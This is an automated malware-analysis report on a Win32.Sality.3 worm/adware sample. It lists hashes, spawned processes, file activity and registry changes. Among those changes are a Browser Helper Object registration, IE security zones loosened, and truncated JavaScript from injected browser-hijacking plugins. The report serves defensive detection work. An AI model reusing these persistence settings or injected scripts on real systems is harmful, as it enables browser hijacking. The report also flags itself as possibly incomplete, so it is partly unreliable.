Win32.Sality.3_df19badc8d

by malwarelabrobot on January 13th, 2015 in Malware Descriptions.

Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: df19badc8d07c6bee18a57e61ea387c2
SHA1: 2b7c6da2e61c98224b23f712beeaf74ba38c0787
SHA256: 3b08960f3416e9adf2f25fc702b4bbff4a716875de20f7035615ce17b717e588
SSDeep: 393216:Jm27XOLzs3pUzZyj2wps8oEmTRoUeBxI:Jm27gzs3pUzMjfGoUe
Size: 13067784 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: YourTemplateFinder
Created at: 2012-12-04 15:55:11
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Behaviour: WormAutorun
Description: A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Worm creates the following process(es):

Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632

The Worm injects its code into the following process(es):

Explorer.EXE:2032

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Ge-Force-codedownloader.exe:2564 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)

The process Khtmovq.exe:664 makes changes in the file system.
The Worm creates and/or writes to the following file(s):


The Worm deletes the following file(s):


The process %original file name%.exe:1616 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB4.tmp (0 bytes)

Registry activity

The process Ge-Force-codedownloader.exe:2504 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 3B B8 98 C0 3E 1C 13 AA 25 7E 13 60 E7 DA C3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Ge-Force-codedownloader.exe:2564 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 8A EA 02 46 B1 54 1E 18 F1 0E CA 5C 93 93 E3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2416 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Ge-Force"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}]
"(Default)" = "ISandBox"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
"(Default)" = "Ge-Force"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129 Type Library"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"Version" = "1.0"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\0\win32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 CF F8 5D EB 30 6B 3C 3D 18 05 8A 10 0B BE F6"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}]
"(Default)" = "ICrossriderBHO"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
"(Default)" = ""

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
"NoExplorer" = "1"

"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

The Worm deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]

The process Khtmovq.exe:664 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Ge-Force\Plugins\192]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/192.js"

[HKCU\Software\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\17]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/17.js"

[HKCU\Software\Ge-Force\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('...', 'fuetdjnmfc'); }"

[HKCU\Software\Ge-Force\Plugins\22]
"Name" = "resources"

[HKCU\Software\Ge-Force\Plugins\39]
"Version" = "5"

[HKCU\Software\Ge-Force\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:''});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:''});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:''});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:''});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:});this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:});this.addEngine({name:ask,url"

    [HKCU\Software\Ge-Force\Plugins\301]
    "Version" = "2"

    [HKCU\Software\Ge-Force\Plugins\262]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/262.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Ge-Force\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\Ge-Force\Manifest]
    "PublisherId" = "21836"

    [HKCU\Software\Ge-Force\Plugins\262]
    "Name" = "pops_5_j_m"

    [HKCU\Software\Ge-Force\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\Ge-Force\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi"

    [HKCU\Software\Ge-Force\Plugins\242]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\Ge-Force\Plugins\72]
    "Version" = "5"

    [HKCU\Software\Ge-Force\Plugins\44]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)a"

    [HKCU\Software\Ge-Force\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\Ge-Force\Plugins\337]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:TEN}))();};"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKCU\Software\Ge-Force\Plugins\288]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/288.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\Ge-Force\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\Ge-Force\Installer]
    "CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

    [HKCU\Software\Ge-Force\Plugins\14]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/14.js"

    [HKCU\Software\Ge-Force\Manifest]
    "UninstallerOfferUrl" = "NA"
    "DisableIe" = "true"

    [HKCU\Software\Ge-Force\Plugins\246]
    "JavaScript" = "var _0x6ef5=["\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72"

    [HKCU\Software\Ge-Force\Installer]
    "DefaultBrowser" = "ie"

    [HKCU\Software\Ge-Force\Plugins\337]
    "Name" = "icm_ten_m"

    [HKCU\Software\Ge-Force\Plugins\39]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/39.js"

    [HKCU\Software\Ge-Force\Plugins\193]
    "Name" = "revizer_p_dynamic_b2b_m"

    [HKCU\Software\Ge-Force\Plugins\301]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('..."

    [HKLM\SOFTWARE\Ge-Force\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\Ge-Force\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\Ge-Force\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Ge-Force\Installer]
    "Time" = "1421039403"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
    "Policy" = "3"

    [HKCU\Software\Ge-Force\Plugins\184]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/184.js"

    [HKCU\Software\Ge-Force\Plugins\40]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/40.js"

    [HKCU\Software\Ge-Force\Installer]
    "AdditionalInfo" = "{"asw":[0, 1073750528, -2147483648, 0],"browser_name":"ie"
    "StatsDomain" = "http://stats.newstatsclientcloud.com"

    [HKCU\Software\Ge-Force\Plugins\263]
    "Name" = "intext_5_j_m"

    [HKCU\Software\Ge-Force\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveI"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Ge-Force\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('..."

    [HKCU\Software\Ge-Force\Plugins\350]
    "URL" = "http://js.newstatsdemosrv.com/plugins/mins/350.js"

    [HKCU\Software\Ge-Force\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\Ge-Force\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\Ge-Force\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\Ge-Force\Plugins\45]
    "URL" = "http://js.newstatsclientcloud.com/plugins/mins/45.js"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
    "AppPath" = "%Program Files%\Ge-Force"

    [HKCU\Software\Ge-Force\Plugins\38]
    "Version" = "4"

    [HKCU\Software\Ge-Force\Plugins\356]
    "Name" = "icm_man_m"

    [HKCU\Software\Ge-Force\Manifest]
    "EnableSearchIE" = "false"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Ge-Force\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Ge-Force\Plugins\78]
